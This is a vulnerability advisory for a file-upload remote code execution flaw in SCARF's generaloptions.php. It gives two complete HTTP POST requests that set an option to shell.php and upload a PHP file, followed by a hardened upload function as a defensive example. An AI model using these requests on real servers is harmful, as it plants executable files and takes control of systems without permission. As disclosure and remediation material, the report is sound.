SCARF Vulnerability Report

A remote command execution vulnerability exists in generaloptions.php in Paul Tarjan Stanford Conference And Research Forum (SCARF) before 20070227.

In generaloptions.php,

[Screenshot: generaloptions.php source code]

The fifth line updates the data in the options table in the database according to the key/value pairs submitted in the HTTP POST request.
The structure of the options table in the database is as follows:

[Screenshot: structure of the options table]

This means any value field in the options table can be modified.
Line 11 iterates over each uploaded file, looks up the corresponding value in the options table according to $name, and then calls the move_uploaded_file function to move the uploaded temporary file to the path given by that value.
First, set Background Image to shell.php with a POST request:

POST /scarf/generaloptions.php HTTP/1.1
Host: 192.168.59.182
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

Background_Image=shell.php&submit

Then upload a file whose content is <?php phpinfo();?>:

POST /scarf/generaloptions.php HTTP/1.1
Host: 192.168.59.182
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCgwbsOJquAiouDkj
Content-Length: 312

------WebKitFormBoundaryCgwbsOJquAiouDkj
Content-Disposition: form-data; name="Background Image"; filename="a"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryCgwbsOJquAiouDkj
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryCgwbsOJquAiouDkj--

Then visit http://192.168.59.182/scarf/shell.php

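A hardened form of the upload step described above, as an added example that is not SCARF's own code: the destination path is built on the server instead of being read from an options value that a request can change. The names UPLOAD_DIR, ALLOWED_TYPES and store_option_image are assumptions, as is an upload directory that the web server does not execute PHP from.

```php
<?php
// Added example, not SCARF code. All names below are hypothetical.

// Assumed: a directory the web server serves as static files only.
const UPLOAD_DIR = __DIR__ . '/uploads';

// Detected MIME type => extension assigned by the server.
const ALLOWED_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and move it to a server-chosen path.
 * Returns the stored path, or null when the upload is rejected.
 */
function store_option_image(array $file): ?string
{
    // Accept only a completed upload that PHP itself received.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Decide the type from the file content, never from the client-supplied
    // filename, the Content-Type header, or a value stored in the options table.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null) {
        return null; // a file holding only PHP source is not detected as an image
    }

    // The name and extension are generated here, so neither a POST parameter
    // nor a database row can pick the directory or make the file executable.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;

    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}
```

The caller stores the returned path as the option's value itself, so the value column for an upload option is never writable from request parameters.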